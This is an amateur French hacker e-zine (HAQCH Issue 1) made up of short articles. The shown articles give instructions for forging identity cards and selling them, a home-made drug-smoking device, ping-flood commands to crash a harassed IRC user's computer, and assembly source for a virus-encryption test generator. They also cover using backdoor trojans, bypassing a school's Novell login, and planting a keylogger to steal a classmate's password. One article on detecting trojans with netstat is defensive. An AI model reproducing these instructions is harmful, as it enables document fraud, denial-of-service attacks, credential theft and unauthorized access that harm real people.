Copy Link
Add to Bookmark
Report

HAQCH Issue 1

eZine's profile picture
Published in 
HAQCH
 · 11 Oct 2020

  

_ _ _ _ _
|H| |H| /A\ QQQQQQQ CCCCCCCC |H| |H|
|H| |H| /AAA\ QQ QQ CC |H| |H|
|H|____|H| /A/ \A\ QQ QQ CC |H| |H|
|H|HHHH|H| /A/___\A\ QQ QQ CC |H|HHHH|H|
|H| |H| /AAAAAAAAA\ QQ QQ CC |H| |H|
|H| |H| /A/ \A\ QQ QQ CC |H| |H|
|H| |H| /A/ \A\ QQQQQQQ QQ CCCCCCCC |H| |H|



Bon ben cé parti, ma nouvelle e-zine. J'espere que celle-ci va plaire aux gens qui la lisent. Pour commencer, je vais répèter la même routine que habituellement une e-zine "illégal" annonce en début d'intro (Que j'Ai copier quelque part). La lecture de cette publication électronique implique la lecture de ce
cet extrait:.

Ce texte est fourni au lecteur à titre purement éducatif et informatif.En aucun cas les auteurs n'incitent ce dernier au non respect de la loi, sous toute forme qu'il soit.Ce texte est destiné uniquement aux personnes auxquelles les auteurs l'ont remis, en conséquence il peut être considérée comme une communication privée des auteurs avec ces personnes. Toute organisation représentant un ordre quelconque ou toute agence de renseignement est considérée comme étrangère aux personnes autorisées à lire ce texte et en conséquence aucune poursuite ne pourraître faite contre les auteurs pour leur publication.


Pour les curieux qui se demande ce que ca veux dire haqch, mais dite vous que j'Ai pris ca au hasard, c'est pourquoi faite aller votre imagination.


Adresse: http://www.haqch.espace2001.com
email: bobki@altern.org
Channel irc: #haqch sur Undernet Possibiliter de key: qch (Quelquefois mon bot fuck)

Si vous voulez faire parti de la gang contacter moi!!!!

Vu que c'est la première, et que j'Ai pas eu grand temps pour la faire, elle ne sera pas bien longue, mais on va se reprendre dans le deuxieme numéro, qui lui, va sortir un jour, mais quand??? Quand je vais avoir le temps!!!. Et pour bien débuter cette e-zine, je vous souhaite bonne lecture!!!!!!!!!!

Derniere chose, je voudrais dire que je me fou completement des fautes d'orthographes, facque venez pas m'Achaler avec ca.
_____________________________________________________________________________
____________________________________________________________________________
Table des matieres

1- _Franck--->>> Comment se débuter une compagnie de fausses cartes.
2- _Franck--->>> Qu'est-ce que un Stromgol???
3- _Franck--->>> Démasquez les chevaux de Troie.
4- endrix---->>> Le ping
5- endrix---->>> Les Virus
6- endrix---->>> La Protection
7- endrix---->>> Fun sur les Ordis De l'Ecole
8- endrix---->>> Fichiers PWL
9- PiX1------>>> Comment créé...de la mesa sapientum banadine
10-PiX1------>>> Comment créé...(un dérivé du) LSD-25
11-PiX1------>>> Le saviez-vous?
12-Tod------->>> Le canna punch
13-_Franck--->>> Comment faire du Nitrate de Potassium?
14-_Franck--->>> Comment fabriquer de la poudre noir (Poudre a Canon)?
15-_Franck--->>> Comment fabriquer une bombe de chlore de piscine?
16-_Franck--->>> Désignations courantes.
17-_Franck--->>> Comment faire des meches qui brulent 2 pouces a la minute?
18-_Franck--->>> Comment faire des meches qui brulent 40 pouces a la minute?
19-_Franck--->>> Comment faire des feux de différentes couleurs?(feux de bengales)

___________________________________________________________________________________________________________________________________________________________






_Franck--->>>Comment se débuter une compagnie de fausses cartes<<<-----------

Dans l'Article qui va suivre, je parle pas de carte d'identité parfaite, comme celle d'assurance maladie, mais bien des cartes comme celle de l'école, du permis de conduire ou d'autres cartes qui n'ont pas de relief ou d'hologramme dessus.

Pourquoi avoir une fausse carte:

1- Si ta pas 18 ans, et que tu veux rentrer dans les bars ou acheter des
armes ou autres.

2- Si tu veux te faire venir un colis sous un autre nom.

3- Si t'emprunte un objet avec une carte d'identité, et que l'intention de ne pas le remettre.

4- Ou pour crosser les cochons (polices)


Matériaux nécessaires:

1- Un Scanneur de haute qualité (préférence: plus que 600X600 par pouce carré)

2- Une imprimante (laser de préférence) (préférence: plus que 600X600 par pouce carré)
3-Un logiciel pour modifier des images

4-Un plastificateur (entre 3 et 5 mm)

****PLus que votre imprimante et votre scanneur est de qualité (points,pouce), mieux seront les cartes.

Procédure:

Vous prener votre carte, la scanner à la meilleur qualité possible. Ensuite, exemple vous voulez modifiez votre date de naissance pour avoir 18 ans. Exemple que votre date est 82-09-18 et quelle est écrit avec une police spécial, tu essais de faire des copies coller. Exemple: tu copie le 0 et tu le place par dessus le 2 de l'Année de naissance, ce qui donne 80-09-18.Pour autres changements sur la carte cé une technique similaire. Ensuite vous imprimez à une qualité la plus élever possible.Par la suite, vous découper votre fausse carte, de maniere quel soit la meme grosseur que la vrai, et vous plastifier le tout, avec un plastique la même épaisseur que l'original.


Pour le commerce:

Cela peu être tràs payant si vous vous équipiez d'équipements exéllents.PLus les cartes sont exellentes plus les gens sont intéresser a payer le prix parce qu'ils ont moins de chance de se faire prendre. C'est pourquoi si vous vous équipier d'un scanner (600X600) avec une imprimante laser similaire et un plastificateur (Cela les 3 ensemble vous coutera entre 900$ et 2500$), vous pouvez faire une bonne qualité de carte d'identité.Si vous vendez les cartes que vous faisez 15$ chaque ou même 25$, cé pas long et votre équipement est payer, et surtout, les profits commence à rentrer.
Un conseil, essayer de vendre vos fausses cartes juste au gens que vous connaissez pour pas vous faire prendre.

Je vous souhaite bonne carriere!!!héhé


_Franck

_________________________________________________________________________________________________________________________________________________________
















_Franck ---------->>>>> Qu'est-ce que un Stromgol??? <<<<<--------------

Dans l'Article qui suit, une technique de fumage (weed ou autre) va etre présenté, pour cetain elle est déja connu, pour d'autre vous allez apprendre un nouveau et merveilleux truc pour consummer votre "boucane".

Premierement, le nom Stromgol à été batiser par un de mes chums, mais cette invention peut porter un autre nom dans différentes endroits dans le monde. J'explique le principe.

Matériaux

1 bouteille de 2 litres de liqueurs vide (avec bouchon)
1 couteau pour couper du plastique
1 tuyaux de plastique flexible (Environ 2 pieds)
1 ruban adhésif
2 Couteaux pour fumer
1 Torche pour chauffer (propane ou autre) les couteaux à rouge
2 Personnes de préférences
Une quantité de stock à fumer


Explications

-Prener votre bouteille 2 litres et percer un trou de la forme d'un carré sur l'un des cotés (3 pouces par 3 pouces).

-Percer un trou dans le bouchon la grosseur du tuyau.

-Placer le tuyau dans le trou du bouchon, en mettant environ 2 pouces de tuyaux dans la parti de la bouteille.

-Prendre le ruban adhésif, et coller le tuyau au bouchon de facon que l'Air ne puisse sortir en dehors du tuyau.

-A cette étape votre Stromgol est pret.

-Voici un dessin que j'Ai fais pour vous montrer de quoi ca l'Air. C'est le fichier stromgol.bmp dans le document .zip dont est compris ce document

-Ensuite vous faite chauffer les couteaux à rouge avec la torche pour fumer vos pofs.

-Vous metter votre bouche sur le tuyaux, votre chum prend la pof avec les couteaux, et met les couteau dans le trou de forme carré pour que la boucane reste dans la bouteille, et vous durant ce temps vous aspirer.

-Vous recommencer les 2 dernières étapes au besoins

-Cela est un résumer bref de cette technique de fumage, mais elle est assez simple. Avec ce truc vos soirés vont etre encore plus animer et vont vous coûter moins cher, parce que vous allez voir que il faut moins de "stock" pour procurer uen excellente effet, héhé.....



Articles produite par _Franck

_________________________________________________________________________________________________________________________________________________________








_Franck------------->>>Démasquez les chevaux de Troie<<<--------------------


Pour savoir si un cheval de Troie est installé sur votre PC et s'il envoie clandestinement des informations par l'internet, servez-vous d'un utilitaire système de Windows.

Ce programme, Netstat, n'est hélas pas accessible par le menu Démarrer ni documenté dans l'aide de Windows. Vous pouvez toutefois le lancer avec la commande netstat dans une invite MS-DOS.

Pour détecter un cheval de Troie, procédez de la façon suivante.

1-Fermez toutes les applications de transmission par l'internet. Noubliez pas les programmes de courrier électronique qui vérifient régulierement l'arrive de nouveau courrier sur le serveur POP ou Personal Web Serveur
Ces programmes pourraient en effet falsifier les valeurs mesurées et provoquer une fausse alerte.

2-Connectez-vous sur n'importe quel ftp

3-Sur le ftp téléchanger un fichier d'environ 1 meg pour faire croire à une activité en ligne. Le cheval de Troie est conçu pour attendre une connexion Internet active par laquelle il peut transférer ses données. Pour ne pas se faire remarquer, il s'assure que l'utilisateur se sert activement de cette connexion. Ses propres paquets de données sont ainsi dissimulés dans la masse.

4-Enregistrer le fichier sur le disque dur.

5-Ouvrez une fenêtre DOS avec la commande Démarrer/Programmes/Commandes MS-DOS.

6-Vérifiez avec Netstat quelles connexion TCP/IP sont acuellement actives. Laissez fonctionner Netstat pendant un moment tout en enregistrant les résultats dans un fichier journal. Pour cela tapez la commande:

netstat -a 1 > netstat.txt

Explication des options de cette ligne:

-a: oblige Netstat à surveiller toutes les connexions existantes. Par défaut et pour ne pas submerger l'utilisateur, le programme se contente des informations indispensables. Les informations trahissant une éventuelle transmission clandestine risquent alors d'être ignorées. C'est pourquoi vous devez vous assurer que Netstat enregistre toutes les données.

Le chifre détermine en secondes le laps de temps que Netstat laisse écouler entre les vérifications. Nous avons choisi l'intervalle le plus petit, 1, pour qu'aucune connexion ne nous échappe.

Par défaut. Netstat affiche les résultats à l'écran. Toutefois cet intervalle d'une seconde ne laisse pas le temps de lire. C'est pourquoi nous demandons au programme de sortir les informations dans le fichier Netstat.txt à l'aide de la commande > netstat.txt . Cette commande n'est d'ailleur pas spécifique à Netstat, elle fonctionne dans tous les programmes de l'invite MS-DOS.

7- Au bout d'un moment, quittez Netstat en appuyant sur les touches Ctrl + C

8-Arrêter la connexion FTP, même si le fichier n'est pas entièrement téléchargé.

9-Fermez la connexion internet.

10-Dans un éditeur de texte quelconque, ouvrez le fichier Netstat.txt, en vérifiez les connexions enregistrées.

Si vous voyez des communications avec d'Autres ordinateurs, méfiez-vous. Notamment si vous trouver un numero IP au lieu d'un nom complet. Il s'agit vraisemblablement d'une transmission suspecte.

Ce texte-ci a été prit dans le livre "Sécurité et Protection", p 206.


Article produite par _Franck

__________________________________________________________________________________________________________________________________________________________




=============================================================================
=============================================================================
_ ____ _
| | ___| _ \(_)_ __ __ _
| | / _ \ |_) | | '_ \ / _` |
| |__| __/ __/| | | | | (_| |
|_____\___|_| |_|_| |_|\__, |
|___/
=============================================================================
=================================par endrix==================================

Bon.... Pourquoi j'ai écrit ce texte ??? Ben parce que je suis vraiment
tannez de dire au personnes comment utiliser cette fonction quelque peut
"cacher" de Microsoft qui, part fois, peux etre tres destructive.

Pour me contacter, mon email est : lordendrix@hotmail.com .

Pour commencer, Ping sert a compter, en temps, le lag qu'il y a entre deux
ordinateur. Vous verez les signes suivants : time<10ms ce qui veut dire qu'il
y a 10 millisecondes de lag entre les ordis. Donc, de cette manière, vous
envoyez un signal a l'autre ordinateur et lui vous réponds.

Mais, Comment je peux faire crasher un ordi avec ca ???

Bon.... pensons un peu... Si tu as une connection rapide, comme un modem
cable, ou une ligne LNPA, ou ISDN.... Tu peux envoyer des pings TRÔS rapidement on peut appeller ca... un ping flood !! La différence entre un ping flood de irc et un ping flood directement sur la connection du gars c'est qui si c'est de irc, la connection va débranché mais l'ordi plantera pas :))))

Maintenant, voyon voir de quoi a l'air ping.exe(dans le dir de windows)
Allez Démarer, Programme et ensuite dans Commande MS-DOS. Apres, vous allez
voir :

Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1998

C:\WINDOWS>

tapez :

C:\WINDOWS>ping

vous allez voir :

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list

Options:
-t Ping the specifed host until stopped.
To see statistics and continue - type Control-Break;
To stop - type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.



Vous voyez que vous pouvez faire plusieurs combinaisons avec la commande ping.
· cette ligne, faite la commande suivante :

C:\WINDOWS\ping -t -l 10 127.0.0.1
Ca sa va pigner votre ordinateur. C'est suppos‚ donner ca :

Pinging 127.0.0.1 with 10 bytes of data:

Reply from 127.0.0.1: bytes=10 time=1ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128
Reply from 127.0.0.1: bytes=10 time<10ms TTL=128

jusqu'à temps que vous l'arrêtiez....... Vous voyez que le temps entre votre
ordinateur et.... votre ordinateur n'est pas trŠs long !! :-|

Bon.... supposont qu'il y a un con qui vous fait chier.. son nick : con
Allez dans le Status, tappez :
/dns con
cette commande va vous donnez son IP (ex : 207.96.128.233)
Les 3 premiers chiffres sont du serveur et le dernier, c'est le nombre de
connection ulitiler(max 255). Donc, retournez dans votre fenˆtre dos et tappez:

C:\WINDOWS>ping -t -l 256 207.96.128.233

faite cette commande plusieur fois, ouvrez plusieurs fenˆtre dos et il va faire
un ping timeout.

comment faire crasher un system Windows 98 ???? Quand vous allez faire le
/dns con, vous verez quelque chose comme ca :

***Looking up port013.cactuscom.com
***Resolved port013.cactuscom.com to 207.253.190.13
Le IP est 207.253.190.13 et le domaine : port013.cactuscom.com

C:\WINDOWS\ping -l 65510 port013.cactuscom.com

Plusieurs fenˆtres et, bye bye dude !!!

J'espŠre que vous ferez pas trop de connerie avec ca la !!!! Adios et a
bient“t,
endrix
Http://haqch.espace2001.com
...oO Pour plus de Zines Oo...
=============================================================================
=============================================================================








=============================================================================
================================= Par endrix=================================
=============================================================================
__ ___ _ _
\ \ / (_)_ __(_|_)
\ \ / /| | '__| | |
\ V / | | | | | |
\_/ |_|_| |_|_|


=============================================================================
=============================================================================
=============================================================================



Introduction : Les virus sont devenus une menace permanente. Une infection est
actuellement 20 fois plus probable qu’il y a 2 ans. On estime
qu’une entreprise infectée a besoin de 5 jours ouvrables pour
se d‚barrasser totalement de l’assaillant. Donc la lutte
antivirus revêt une importance majeure.
Mais si vous avez des commentaires, suggestions ou juste me
e-mailer ben faite le a cette addresse : fbasoft@yahoo.com ou
sur le chat, je suis sur #outaouais-warrior ou #outaouais ou
#n0past et #pirate sous le nick de : endrix
Site web : http://www.haqch.espace2001.com


1 : Qu'est-ce qu'un virus ?

Un virus est un programme autoreproducteur capable de se propager de
facon autonome. Il causera des d‚gats dans le systeme qu'il a infecte.
Ces degats soit d'ordre logiciel soit meme materiel, certains
n'hesitent pas a detruire votre BIOS, et vont de l'affichage d'un
petit message au formatage complet de votre disque dur. Voici les
sources d'infections :

Une disquette dont le secteur d’amorce est infecte.
Une disquette qui comporte un fichier executable infecte.
Un LAN (Local Area Network ou reseau local) qui contient un poste
infecte. Internet, par simple telechargement.
Le courrier electronique, par un document joint infecte.


2 : Types de virus

On classe les virus de 5 façons :

- Virus du secteur d’amorce ; ils remplacent l’amorce d’un disque par leur propre
code et se chargent ensuite en mémoire centrale. Il rendent inutilisable le
disque d’amorçage et/ou se propagent vers d’autres disques.
- Virus de fichiers ;
ils ajoutent leur code aux fichiers exécutables (*.exe *.com *.bat ) et se
chargent en mémoire centrale afin de contaminer encore d’autre programmes. Il
rendent ces programmes inutilisables.
- Virus furtifs ; ils échappent à toute détection en se camouflant. Une des méthodes
de détection consiste à enregistrer la longueur d’un programme (si le virus a
ajouté son code, on peut facilement comparer avec une simple sauvegarde de ce
progr. )
- Virus polymorphes ; ils modifient leur aspect à chaque nouvelle infection.
- Virus cryptés ; ils modifient leur code, ce qui complique leur détection.
On peut ajouter 2 cas, mais souvent moins fréquents à cause de leur puissance :
- Cheval de Troie ; bombe à retardement implantée dans un programme. Il peut se
déclencher à tout moment ou attendre un signal externe. Ce n’est donc pas un
virus puisqu’il n’est pas conçu pour se reproduire et se propager.
- Bombe logique ; variante du cheval de Troie, elle attend un signal externe pour
exploser. Ce signal peut être une date précise, un lancement d’un certain
programme etc.. Les dégâts causés par cette bombe peuvent être d’ordre matériel
des fois, comme une modification du BIOS pour entraîner une surcharge électrique.


3 : Symptomes d'une attaque

Voici les principaux symptomes :

- Un chargement d’un programme plus long que d'habitude.
- Un reseau anormalement charge.
- Memoire centrale insuffisante.
- Espace disque réduit.
- Taille de fichiers qui s'accroît anormalement.
- Systome et/ou programmes qui plantent.
- Messages d'erreurs ou messages curieux.
- Un jeu de ping-pong apparaît.
- Les caracteres s'ecroulent.
- Melodies bizarres au format midi.
- Acces disque multiplies.
- Perte de fichiers et de données.
- Programmes refusant de s’exécuter ou s’exécutent mais de façon anormale.
- Autoformatage du disque dur.


4 : Fichiers cibles des virus

Le premier objectif est la contamination de une ou plusieurs cibles qui lui permettront d'etre
relance le plus souvent possible. Une cible est appelee vecteur de contamination.

En principe, il existe 3 phases d'existence :

Infection ; le virus infecte le systome cible.
Contamination ; il se duplique et infecte d’autres cibles sans perturber le fonctionnement du
systome.
Destruction ; il entre en activite et produit les effets pour lesquels il a ete programme.
Cibles des virus :
- Fichiers executables, surtout les .COM (avec le tres celebre COMMAND.COM qui est lance a
chaque démarrage du système ).
- Fichiers systomes, particulierement les IO.SYS et MSDOS.SYS
(qui sont lances au demarrage du systome aussi) .
- Les fichiers temporaires de recouvrement .OVL .
- Fichiers binaires .BIN.
- Fichiers pilotes .DRV.
- Le secteur de la table de partition du disque dur (lu par le BIOS à chaque initialisation)
ou d'une disquette BOOT.


5 : Programmes antivirus

- Thunderbyte (http://www.thunderbyte.com)
- Panda (http://www.pandasoftware.com)
- Norton (http://www.nortonutilities.com)
- bien d'autre....


6 : Voici la source d'un Virus(en asm) :


DSCE_GEN SEGMENT
ASSUME CS:DSCE_GEN,DS:DSCE_GEN
ORG 0100h

MSG_ADDR EQU OFFSET MSG-OFFSET PROC_START-0007h

EXTRN DSCE:NEAR,DSCE_END:NEAR
EXTRN RND:NEAR

; ¥H¤Uµ{¦¡¡AÝ£¤F­nª`·NªÝ¦a¤è¦Ýª`¸Ñ¡A¨è¥¦Ý¡¥÷¦Ý¤v¬ã¨s

START:
MOV AH,09h
MOV DX,OFFSET DG_MSG
INT 21h

MOV AX,OFFSET DSCE_END+000Fh ; ¥+µ{¦¡ + DSCE+000Fh ¤§«áªÝ¦ì§}
; ­YÝî 0100h «h¦¨¬Ý¥+µ{¦¡ + DSCE ªÝªø«×

MOV CL,04h
SHR AX,CL
MOV BX,CS
ADD BX,AX

MOV ES,BX ; Ý] ES ¥+¨Ó©ñ¸Ñ½Xµ{¦¡©MÝQ½s½X¸ê®Æ
; ¸Ñ½Xµ{¦¡Ýݤj¬Ý 1024 Bytes
; ­Y¥+¦bÝ`¾nµ{¦¡®+¡A«h¶·ª`·N¤+ÝtªÝÝO¾Ð+é¤j¤p

MOV CX,50
DG_L0:
PUSH CX
MOV AH,3Ch
XOR CX,CX
MOV DX,OFFSET FILE_NAME
INT 21h
XCHG BX,AX

MOV BP,0100h ; ¸Ñ½Xµ{¦¡Ý¾Ý¾¦ì§}
; ¥+¨Ó+g¬r®+«h¨ÝÝý·P¬V++®×¤§¤j¤p¦ÓÝ]

MOV CX,OFFSET PROC_END-OFFSET PROC_START ; ÝQ½s½Xµ{¦¡ªÝªø«×

MOV DX,OFFSET PROC_START ; DS:DX -> ­nÝQ½s½XªÝµ{¦¡¦ì§}

PUSH BX ; «O¦s File handle

CALL RND
XCHG BX,AX
CALL DSCE

POP BX

MOV AH,40h ; ªð¦^®+ DS:DX = ¸Ñ½Xµ{¦¡ + ÝQ½s½Xµ{¦¡ªÝ¦ì§}
INT 21h ; CX = ¸Ñ½Xµ{¦¡ + ÝQ½s½Xµ{¦¡ªÝªø«×¡A¨è¥¦++¦s¾Ý¤£+_

MOV AH,3Eh
INT 21h

PUSH CS
POP DS ; ÝN DS Ý]¦^¨Ó

MOV BX,OFFSET FILE_NUM
INC BYTE PTR DS:[BX+0001h]
CMP BYTE PTR DS:[BX+0001h],'9'
JBE DG_L1
INC BYTE PTR DS:[BX]
MOV BYTE PTR DS:[BX+0001h],'0'
DG_L1:
POP CX
LOOP DG_L0
MOV AH,4Ch
INT 21h

FILE_NAME DB '000000'
FILE_NUM DB '00.COM',00h

DG_MSG DB 'Generates 50 DSCE encrypted test files.',0Dh,0Ah,'$'

PROC_START:
PUSH CS
POP DS
MOV AH,09h
CALL $+0003h
POP DX
ADD DX,MSG_ADDR
INT 21h
INT 20h
MSG DB 'Dark Slayer !!$'
PROC_END:

DSCE_GEN ENDS
END START




7: Conclusion : Ben la j'espère qu'en lisant, vous avez apprit sur les virus
et les leurs fonctions.

==============================================================================
==============================================================================
==============================================================================

- endrix



==============================================================================
================================= Par endrix =================================
==============================================================================
____ _ _ _
| _ \ _ __ ___ | |_ ___ ___| |_(_) ___ _ __
| |_) | '__/ _ \| __/ _ \/ __| __| |/ _ \| '_ \
| __/| | | (_) | || __/ (__| |_| | (_) | | | |
|_| |_| \___/ \__\___|\___|\__|_|\___/|_| |_|

==============================================================================
==============================================================================
==============================================================================

----VOUS VOULEZ ETRE INVINCIBLE ??? FUCK WINDOWS ET FAITE PLACE A LINUX!!!----

Introductions : Bienvenue dans le mon du piratage. Ce document va vous
décrire : (1) Qu'est-ce que piratage.
(2) Technique employe pour "hacker un micro".
(3) Description des techniques.
(4) Ou trouver les outils necessaires pour
effectuer des petites attaques.
(5) Outil pour vous protéger
(6) Mot de la fin.

Eh bien j'espere que ce texte vous aidera a vous protéger
et je connais quelques personnes qui voudront me tuer
après avoir ecrit ce texte.... heehe.... Mais si vous avez
des commentaires, suggestions ou juste me e-mailer ben
faite le à cette addresse : fbasoft@yahoo.com ou sur le
chat, je suis sur #outaouais-warrior ou #outaouais ou
sur #n0past et #pirate sous le nick de : endrix
http://endrix.cjb.net



(1) Qu'est-ce que le piratage ???

Le piratage, hacking and anglais, est l'art de s'infiltrer dans des
systeme informatique dont tu n'as pas l'accès et prendre de l'information
sans rien détruire. Etre un hacker, c'est etre curieux, découvrir de
nouvelle choses, le défit de pénétrer des systèmes super protégé comme :
(FBI, NSA, CIA, Microsoft, IBM......)
Il y a aussi le "cracking" le cracking a 2 fignification :
1. "Cracker" un programme c'est editer un .exe et le modifier pour pouvoir
l'utiliser sans limite. Souvent si vous avez des programmes qui sont d'une
période d'utilisation de 30 jours, ben il existe des "cracks" qui vont
faire que vous pourrez l'utiliser toute votre vie !!! Pour plus d'info :
http://cracking.home.ml.org
http://get-oscar.home.ml.org
http://www.phrozencrew.org (marche pas tout le temps)
2. "Cracker" un système informatique c'est aussi le pirater mais le
"cracker" ne prend pas seulment les donnés, il essait de détruire le
système avec un virus, en supprimant des fichiers..... Pour plus d'info :
http://www.hackhull.com <-- master of NT destruction


(2) Technique pour hacker un micro

Pour hacker un micro, il y a plusieur technique et voici quelques une :

- Les programmes qui ouvre un "backdoor" sur votre ordi :
- BackOrifice (par http://cultdeadcow.com v1 et v2)
- Master's paradise
- Hacker's paradise (dur à trouver)
- Backdoor2
- Socket de Troie
- Absolute Control
- NetBUS
- je pense que c'est tout la....

- Technique de partage de fichier un réseaux
- Le reniflement (sniffing)
- L'addresse factice (IP spoofing et pour hacker les gros serveurs)
- Les vers (plus pour hacker les gros systemes)
- Les trapes (beaucoup dans Windoz)
- Force brute (plus pour hacker les gros systemes)



(3) Description des techniques

- Les programmes qui ouvre un "backdoor" sur votre ordi.
Tout ces programmes marchent de la meme manière. Ils ont tous desoin d'un
virus et en passant CE VIRUS NE FORMAT PAS VOTRE ORDI. Je connais quelques
personnes qui pensent ca mais c pas vrai !! oky ?! La fonction du virus
d'ouvrir un port sur votre ordi (5000, 31337 et 12345) et le virus agis
comme serveur et le programme comme client. Donc quand vous êtes infectés
par le virus, vous avez juste à entrer le IP de la personne (dans irc, en
faisant /dns (le nick du gars) et clicker sur connect pi le virus vous
donne accès à l'ordi du gars !!! Pi après être connecté, vous pouvez....
mmmm... Modifier le reg, accès au HD, ouvrir sont CD-ROM, lui envoyer des
messages, mettre un mot de passe sur sont ordi(avec netbus mais il y a des
passwords cracker).... tout faire !!!! Pour plus d'information sur les
trojans, leurs virus et tous... consulté le document "Trojans" (vol 1.4)

- Technique de partage de fichier
Cette technique fonctionne seulement si dans votre configuration réseaux
vous êtes en partage de fichier. Ya pas beaucoup de monde qui sont comme
ca mais il y en a. Cette technique consiste à se connecter sur l'ordi du
mec avec les commandes de dos suivante : - nbtstat.exe
- nslookup.exe
- net view \\....
Je ne vais pas montrer comment utiliser cette manière.


- Reniflement (sniffing)
Le pirate reprogramme l'ordinateur pour qu'il intercepte chaque message
qui traverse le réseaux, meme si celui-ci ne lui est pas addressé.


- L'addresse factice (IP spoofing)
L'addresse d'un ordinateur, Internet Provider(IP), qui permet de le
reconnaître sur le réseaux, est unique. Elle est octroyée par des
services spécialisé et certifiés. Un pirate peut parfaitement modifier
celle de sont ordinateur et se faire passer pour quelqu'un de connu du
serveur victime (aussi utilisé pour faire des "takeovers" sur irc.

- Les vers
Il s'aggit d'un programme intelligent et autonomes capables de se propager
et de se dupliquer seuls(un virus). Ce type d'attaque est très rare parce
que les serveurs se dodifis beaucoup mais windoz NT fonctionne très bien
avec ces choses la......

- Les trappes
Ce sont des points d'entrée volontairement créés par les concepteurs
des systèmes d'exploitation. Les trappes ignorent toutes les mesures.
Comment en 1983, Ken Thompson, l'un des concepteurs d'Unix a révélé
l'existence d'une trappe. Juste en tapant une comande, d'importe qui
pouvais se connecter sur l'ordinateur d'un autre.

- Force brute
Technique qui consiste à trouver le mot de passe d'un serveur pour y
pénétrer. Pour le faire ca prend un "password cracker". Ce programme,
à parir d'un encyclopédie de mot essait tout les mot possible sur le
mot de passe.




(4) Ou trouver les outils nécessaires pour effectuer des petites attaques.

CES OUTILS SONT POUR ESSAYER SUR VOUS MEME, PAS SUR LES AUTRES.

- Des passwords crackers
- Des Nukers, OOB, ICMP
- Texts - FAQ
- Flooders, ICQ, Irc
- Port Scanners, Listeners
- Trojans
- Beaucoup d'autres !!! ...
-------

- WarForge : http://www.warforge.com
- Anti-Online : http://www.antionline.com
- Hackers : http://www.hackers.com
- Ou juste me le demander


(5) Outil pour vous protéger.

- BouffeTroyen (delete les trogens sur votre ordi)
http://bouffetroyen.cjb.net
- Conseal PC Firewall (un bon firewall)
http://www.signal9.com
- @Guard (FireWall)
http://www.???.com
- PC secure (FireWall)
http://www.???.com
- Port Listen (FireWall)
demandez le moi
- NukeNabber (FireWall)
http://www.???.com


(6) Mot de la fin.

Maintenant que vous savez comment fonctionne le "hacking", vous allez
vous procurer les outils que j'ai dit et protéger votre micro.

==============================================================================
==============================================================================
==============================================================================

- endrix



===========================================================================
================================= Par endrix =================================
==============================================================================
_____ ___ ____ _____
| ___/ _ \ | _ \ | ____|
| |_ | | | || | | || _|
| _|| |_| || |_| || |___
|_|(_)\___(_)____(_)_____|

Fun sur les Ordis De l'Ecole
==============================================================================
==============================================================================
==============================================================================

Introduction : Vous trouvez l'ecole plate comme moi ??? Bien, j'ai trouve un
moyen d'avoir ben du fun avec les ordinateurs de votre école!
Moi ca a toujours bien marché pi ca a toujours fait capoter le
prof ou le technicien en informatque. Dans ce texte, je vais
vous dire quelque moyen de faire chier le prof d'info et le
technicien en faisant des choses ben facile qui !!!
Mais si vous avez des commentaires, suggestions ou juste me
e-mailer ben faite le à cette addresse : fbasoft@yahoo.com ou
sur le chat, je suis sur #outaouais-warrior ou #outaouais ou
#pirate ou #n0past sous le nick de : endrix
Http://www.haqch.espace2001.com


(1er) Moyen(Novell) :
Si vous allez dans un cegep au il faut entrer sont numero
etudiant pour logger sur le reseaux(comme moi) lisez ceci!
Ca c'est pour ceux qui ont Novell :
1 - Quand vous ouvrez l'ordinateur et que la fenetre de Novell
apparait qui dit d'entrer le mot de passe, peser sur
Ctrl+ESC, ceci va faire apparaître une autre fenêtre qui
va vous permettre de loader n'importe quel programme sans
que le technicien ne s'en appercoive. Vous pouvez aller sur
l'internet, gosser avec les .exe dans c:\novell ..... Tout
plein de choses à faire.
2 - Clicker sur l'icone de reseaux dans le bureaux, clicker sur
n'importe quel icone(dans la fenêtre qui va appraitre) avec
le boutton de cote et allez dans send message. Ceci va
faire apparaitre un autre fenêtre qui si vous marquer le
numero etudiant de votre ami, vous pouvez lui envoyer un
message. Maintenant au cegep de Hull il est interdi
d'utiliser la messagerie novell.
3 - Pour voller un mot de passe a quelqu'un. Aller downloader un
keystroke recorder. Ce programme enregistre chaque touche
qui a ete tappe sur le clavier. Apres avoir installer ce
programme, attendez que quelqu'un log avec sont mot de passe
et quand qu'elle est logger, allez la voir et dite quelque
chose comme : "Scuse, j'ai oublier de copier un fichier
texte, tu peux me laisser le faire ??"
Naturellement elle va
dire oui et allez copier le fichier que le programme a fait
(dans le dir du programme). Quand la personne va se delogger
aller sur un ordi, entrer le numero etudiant, le mot de
passe de la personne(sur le fichier texte) pi la vous etes
entrer sur sa connexion. Ne faites pas de connerie avec ca !
j'utilise IK comme Keystroke recorder. (http://www.???.com)


(2eme) Moyen (n'importe quel ordi, novell ou pas) :

1 - Modifier le fichier c:\logo.sys. Ce fichier contient l'image de windows
quand il load. +crivez quelque chose comme "!!!SCHOOL SUCKS!!!"

2 - Faite un programme en QuickBasic de mot de passe, screen saver....
ex : si le programme se nomme.... allo.exe (en quickbasic que vous avez
fait.) copier le programme dans c:\windows\system
Editer le autoexec.bat et après la ligne : PROMPT $p$g, marquer :
c:\windows\system\allo.exe
